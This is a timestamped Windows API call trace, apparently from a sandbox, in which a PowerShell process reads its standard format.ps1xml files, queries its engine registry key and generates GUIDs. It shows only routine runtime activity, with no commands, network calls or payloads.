	[0445.704] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e9480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e9480*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.705] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e9480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e9480*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.705] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e9480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e9480*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.706] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e9480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e9480*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.706] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e9480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e9480*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.706] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e9480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e9480*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.707] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e9480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e9480*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.707] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e9480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e9480*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.707] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e9480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e9480*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.708] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e9480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e9480*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.708] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e9480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e9480*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.708] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e9480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e9480*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.708] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e9480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e9480*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.709] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e9480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e9480*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.709] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e9480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e9480*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.709] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e9480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e9480*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.710] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e9480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e9480*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.740] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e9480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e9480*, lpNumberOfBytesRead=0x12d2d8*=0xbce, lpOverlapped=0x0) returned 1
	[0445.740] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e8bb6, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e8bb6*, lpNumberOfBytesRead=0x12d2d8*=0x0, lpOverlapped=0x0) returned 1
	[0445.741] ReadFile (in: hFile=0x2fc, lpBuffer=0x34e9480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x34e9480*, lpNumberOfBytesRead=0x12d2d8*=0x0, lpOverlapped=0x0) returned 1
	[0445.741] CloseHandle (hObject=0x2fc) returned 1
	[0445.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0445.741] SetErrorMode (uMode=0x1) returned 0x1
	[0445.741] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d280 | out: lpFileInformation=0x12d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0445.741] SetErrorMode (uMode=0x1) returned 0x1
	[0445.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0445.742] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d368 | out: phkResult=0x12d368*=0x2fc) returned 0x0
	[0445.742] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2ec, lpData=0x0, lpcbData=0x12d2e8*=0x0 | out: lpType=0x12d2ec*=0x1, lpData=0x0, lpcbData=0x12d2e8*=0x56) returned 0x0
	[0445.742] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d1ea0
	[0445.742] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2bc, lpData=0x1b7d1ea0, lpcbData=0x12d2b8*=0x56 | out: lpType=0x12d2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d2b8*=0x56) returned 0x0
	[0445.742] CoTaskMemFree (pv=0x1b7d1ea0) 
	[0445.742] RegCloseKey (hKey=0x2fc) returned 0x0
	[0445.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0445.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0445.746] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x32cb824d, Data2=0x769e, Data3=0x4939, Data4=([0]=0xb5, [1]=0x6b, [2]=0xee, [3]=0xa3, [4]=0xed, [5]=0xe0, [6]=0x4, [7]=0x40))) returned 0x0
	[0445.747] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xf89f07ce, Data2=0xe989, Data3=0x477f, Data4=([0]=0x89, [1]=0x6, [2]=0x18, [3]=0x9c, [4]=0xaa, [5]=0xdf, [6]=0x28, [7]=0xd7))) returned 0x0
	[0445.747] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xc5003ab6, Data2=0xaea4, Data3=0x4289, Data4=([0]=0x95, [1]=0x7e, [2]=0xf, [3]=0xd2, [4]=0x8e, [5]=0x54, [6]=0x2a, [7]=0x2d))) returned 0x0
	[0445.748] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x235d3917, Data2=0xe535, Data3=0x4c1b, Data4=([0]=0xa7, [1]=0xbe, [2]=0x4e, [3]=0x2f, [4]=0x93, [5]=0x19, [6]=0xa0, [7]=0x1e))) returned 0x0
	[0445.749] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xf76bf83d, Data2=0x2c5a, Data3=0x444f, Data4=([0]=0x8d, [1]=0x38, [2]=0x75, [3]=0xa1, [4]=0x7a, [5]=0x72, [6]=0x16, [7]=0xc4))) returned 0x0
	[0445.749] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xb0ca8c2d, Data2=0x9d18, Data3=0x4b1d, Data4=([0]=0x8a, [1]=0xe6, [2]=0x20, [3]=0x35, [4]=0xec, [5]=0x5e, [6]=0x72, [7]=0xd2))) returned 0x0
	[0445.750] VirtualQuery (in: lpAddress=0x12bf40, lpBuffer=0x12ce00, dwLength=0x30 | out: lpBuffer=0x12ce00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.751] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xb9d182de, Data2=0x9060, Data3=0x43b3, Data4=([0]=0x9b, [1]=0x35, [2]=0x2d, [3]=0xd6, [4]=0x4a, [5]=0x8c, [6]=0x12, [7]=0x1b))) returned 0x0
	[0445.751] VirtualQuery (in: lpAddress=0x12bf40, lpBuffer=0x12ce00, dwLength=0x30 | out: lpBuffer=0x12ce00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.752] VirtualQuery (in: lpAddress=0x12bf40, lpBuffer=0x12ce00, dwLength=0x30 | out: lpBuffer=0x12ce00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.754] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x2d683471, Data2=0xc312, Data3=0x4df9, Data4=([0]=0x89, [1]=0xad, [2]=0x40, [3]=0xff, [4]=0xda, [5]=0x80, [6]=0x8f, [7]=0x98))) returned 0x0
	[0445.754] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x75459e6c, Data2=0x7521, Data3=0x4f4f, Data4=([0]=0x81, [1]=0xd7, [2]=0xbe, [3]=0x92, [4]=0x94, [5]=0x92, [6]=0x48, [7]=0x8d))) returned 0x0
	[0445.754] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xc0430781, Data2=0x7126, Data3=0x4d2f, Data4=([0]=0xab, [1]=0x98, [2]=0x11, [3]=0xd8, [4]=0x78, [5]=0xbe, [6]=0xb4, [7]=0x3b))) returned 0x0
	[0445.754] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xc00b1983, Data2=0x271e, Data3=0x4fae, Data4=([0]=0xb0, [1]=0x1d, [2]=0x71, [3]=0x16, [4]=0x92, [5]=0x5e, [6]=0x5c, [7]=0x9))) returned 0x0
	[0445.754] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xf87887e, Data2=0x69d3, Data3=0x4379, Data4=([0]=0x84, [1]=0x92, [2]=0x89, [3]=0xe2, [4]=0x3, [5]=0x94, [6]=0x5f, [7]=0x6f))) returned 0x0
	[0445.755] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x9d483fbb, Data2=0x4c4c, Data3=0x42e7, Data4=([0]=0x8a, [1]=0xdd, [2]=0x63, [3]=0x80, [4]=0x4, [5]=0xab, [6]=0x53, [7]=0xec))) returned 0x0
	[0445.755] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x8891945b, Data2=0x9ae8, Data3=0x451a, Data4=([0]=0x87, [1]=0xa1, [2]=0xc9, [3]=0x2a, [4]=0xc0, [5]=0x7, [6]=0xe1, [7]=0x58))) returned 0x0
	[0445.755] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x72cd4a82, Data2=0x3298, Data3=0x45e8, Data4=([0]=0x80, [1]=0x5d, [2]=0x4e, [3]=0x46, [4]=0x72, [5]=0x51, [6]=0x16, [7]=0xb2))) returned 0x0
	[0445.755] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xa9de2d, Data2=0xce26, Data3=0x4f3e, Data4=([0]=0xaf, [1]=0xdc, [2]=0xec, [3]=0x94, [4]=0x6f, [5]=0xf2, [6]=0x12, [7]=0xcb))) returned 0x0
	[0445.755] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x8dd57785, Data2=0x5ef3, Data3=0x4406, Data4=([0]=0x88, [1]=0xf3, [2]=0xe6, [3]=0xdd, [4]=0xd2, [5]=0xf6, [6]=0x90, [7]=0xd7))) returned 0x0
	[0445.756] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xb3cd884e, Data2=0x8d4b, Data3=0x4bd0, Data4=([0]=0x8a, [1]=0x28, [2]=0xb, [3]=0x59, [4]=0x20, [5]=0xa9, [6]=0x36, [7]=0x8a))) returned 0x0
	[0445.756] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x920c27da, Data2=0x5426, Data3=0x4e26, Data4=([0]=0xbf, [1]=0x98, [2]=0x91, [3]=0xfb, [4]=0xb0, [5]=0xb4, [6]=0x97, [7]=0xb9))) returned 0x0
	[0445.756] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x9820a0de, Data2=0xfc73, Data3=0x4e00, Data4=([0]=0x80, [1]=0xa7, [2]=0x40, [3]=0xbc, [4]=0x19, [5]=0x8a, [6]=0xc0, [7]=0x60))) returned 0x0
	[0445.756] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x1d2e1f5, Data2=0xb436, Data3=0x40b7, Data4=([0]=0xb2, [1]=0xa5, [2]=0xc7, [3]=0x18, [4]=0x93, [5]=0xed, [6]=0x8, [7]=0x25))) returned 0x0
	[0445.756] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x69434330, Data2=0x21ef, Data3=0x4f46, Data4=([0]=0x9c, [1]=0x68, [2]=0x9f, [3]=0xbb, [4]=0xc2, [5]=0x1f, [6]=0x8a, [7]=0x74))) returned 0x0
	[0445.756] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x85dda9d3, Data2=0xb07, Data3=0x4121, Data4=([0]=0xbd, [1]=0xc2, [2]=0xcb, [3]=0x8f, [4]=0x29, [5]=0xcf, [6]=0xc7, [7]=0xe))) returned 0x0
	[0445.756] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x3a65a781, Data2=0x73f3, Data3=0x423f, Data4=([0]=0xa6, [1]=0xbd, [2]=0x8c, [3]=0x56, [4]=0xa, [5]=0x8, [6]=0xde, [7]=0xeb))) returned 0x0
	[0445.757] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x66e33670, Data2=0xc592, Data3=0x45db, Data4=([0]=0xbe, [1]=0x66, [2]=0x2c, [3]=0x71, [4]=0xad, [5]=0x55, [6]=0x5, [7]=0x1))) returned 0x0
	[0445.757] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x1152d4d3, Data2=0xa20e, Data3=0x44d5, Data4=([0]=0xa3, [1]=0x4d, [2]=0xf7, [3]=0xcb, [4]=0xa5, [5]=0x6e, [6]=0xec, [7]=0xff))) returned 0x0
	[0445.757] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x514dcc1, Data2=0xfbe8, Data3=0x47c6, Data4=([0]=0xb0, [1]=0xb9, [2]=0xea, [3]=0x0, [4]=0xa, [5]=0xe4, [6]=0x96, [7]=0x43))) returned 0x0
	[0445.757] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xfe18d445, Data2=0x9264, Data3=0x4866, Data4=([0]=0x80, [1]=0xa3, [2]=0xbc, [3]=0x88, [4]=0x39, [5]=0x87, [6]=0x3a, [7]=0x0))) returned 0x0
	[0445.757] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xc76fb5f7, Data2=0xc394, Data3=0x4b67, Data4=([0]=0x87, [1]=0xa2, [2]=0xc, [3]=0x78, [4]=0xf4, [5]=0xd5, [6]=0xf6, [7]=0xca))) returned 0x0
	[0445.757] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x85878d41, Data2=0x7709, Data3=0x44aa, Data4=([0]=0x92, [1]=0x3e, [2]=0x8e, [3]=0x38, [4]=0x11, [5]=0x30, [6]=0xaf, [7]=0xfc))) returned 0x0
	[0445.758] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x1c2c162a, Data2=0x29a, Data3=0x433a, Data4=([0]=0xbc, [1]=0xcd, [2]=0x2, [3]=0xef, [4]=0x1a, [5]=0xa9, [6]=0x37, [7]=0xc5))) returned 0x0
	[0445.758] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xc18d91ed, Data2=0xdd8e, Data3=0x46fa, Data4=([0]=0xbe, [1]=0x4b, [2]=0x91, [3]=0xc5, [4]=0x6d, [5]=0x97, [6]=0xc, [7]=0xc7))) returned 0x0
	[0445.758] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x51ecf11b, Data2=0xb79f, Data3=0x4fec, Data4=([0]=0xb2, [1]=0x15, [2]=0xe0, [3]=0x90, [4]=0x38, [5]=0xdb, [6]=0xe2, [7]=0xd0))) returned 0x0
	[0445.758] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x342028d2, Data2=0x9b9a, Data3=0x4aaa, Data4=([0]=0x97, [1]=0xf, [2]=0x35, [3]=0x5a, [4]=0xe, [5]=0x68, [6]=0x19, [7]=0xe3))) returned 0x0
	[0445.758] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x57ca1c1c, Data2=0xe325, Data3=0x423b, Data4=([0]=0xa0, [1]=0x33, [2]=0x87, [3]=0xbe, [4]=0xf4, [5]=0xdc, [6]=0xc2, [7]=0x68))) returned 0x0
	[0445.758] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x475c88dd, Data2=0xf398, Data3=0x41ed, Data4=([0]=0xa2, [1]=0xb9, [2]=0xe1, [3]=0x10, [4]=0xf4, [5]=0x70, [6]=0xd2, [7]=0xbe))) returned 0x0
	[0445.759] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0xf4ef0ddf, Data2=0xf42f, Data3=0x4b42, Data4=([0]=0x87, [1]=0x6a, [2]=0x78, [3]=0xa7, [4]=0x3e, [5]=0x4c, [6]=0xc4, [7]=0x41))) returned 0x0
	[0445.760] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0445.760] GetFileType (hFile=0x2fc) returned 0x1
	[0445.760] SetErrorMode (uMode=0x1) returned 0x1
	[0445.760] GetFileType (hFile=0x2fc) returned 0x1
	[0445.760] ReadFile (in: hFile=0x2fc, lpBuffer=0x35f9a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x35f9a68*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.761] ReadFile (in: hFile=0x2fc, lpBuffer=0x35f9a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x35f9a68*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.762] ReadFile (in: hFile=0x2fc, lpBuffer=0x35f9a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x35f9a68*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.762] ReadFile (in: hFile=0x2fc, lpBuffer=0x35f9a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x35f9a68*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.763] ReadFile (in: hFile=0x2fc, lpBuffer=0x35f9a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x35f9a68*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.763] ReadFile (in: hFile=0x2fc, lpBuffer=0x35f9a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x35f9a68*, lpNumberOfBytesRead=0x12d2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0445.763] ReadFile (in: hFile=0x2fc, lpBuffer=0x35f9a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x35f9a68*, lpNumberOfBytesRead=0x12d2d8*=0x119, lpOverlapped=0x0) returned 1
	[0445.763] ReadFile (in: hFile=0x2fc, lpBuffer=0x35f9a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d2d8, lpOverlapped=0x0 | out: lpBuffer=0x35f9a68*, lpNumberOfBytesRead=0x12d2d8*=0x0, lpOverlapped=0x0) returned 1
	[0445.763] CloseHandle (hObject=0x2fc) returned 1
	[0445.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0445.763] SetErrorMode (uMode=0x1) returned 0x1
	[0445.763] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d280 | out: lpFileInformation=0x12d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0445.764] SetErrorMode (uMode=0x1) returned 0x1
	[0445.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0445.764] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d368 | out: phkResult=0x12d368*=0x2fc) returned 0x0
	[0445.764] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2ec, lpData=0x0, lpcbData=0x12d2e8*=0x0 | out: lpType=0x12d2ec*=0x1, lpData=0x0, lpcbData=0x12d2e8*=0x56) returned 0x0
	[0445.764] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d1ea0
	[0445.764] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2bc, lpData=0x1b7d1ea0, lpcbData=0x12d2b8*=0x56 | out: lpType=0x12d2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d2b8*=0x56) returned 0x0
	[0445.764] CoTaskMemFree (pv=0x1b7d1ea0) 
	[0445.764] RegCloseKey (hKey=0x2fc) returned 0x0
	[0445.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0445.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0445.766] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x36c45fc1, Data2=0x900, Data3=0x4cf6, Data4=([0]=0xab, [1]=0x4e, [2]=0x98, [3]=0x5f, [4]=0xbc, [5]=0x5, [6]=0x49, [7]=0xda))) returned 0x0
	[0445.766] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x8f4ce913, Data2=0x9bd3, Data3=0x4138, Data4=([0]=0xad, [1]=0x21, [2]=0x27, [3]=0x1b, [4]=0x9c, [5]=0xf4, [6]=0x93, [7]=0x9b))) returned 0x0
	[0445.767] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x7f7375dd, Data2=0xe8df, Data3=0x4eac, Data4=([0]=0xb4, [1]=0x68, [2]=0x76, [3]=0x79, [4]=0x7c, [5]=0xd8, [6]=0x1a, [7]=0x57))) returned 0x0
	[0445.767] CoCreateGuid (in: pguid=0x12d590 | out: pguid=0x12d590*(Data1=0x105f7fcb, Data2=0x2a71, Data3=0x4b25, Data4=([0]=0xbb, [1]=0x9a, [2]=0xe3, [3]=0xea, [4]=0x31, [5]=0x4c, [6]=0x0, [7]=0xe5))) returned 0x0
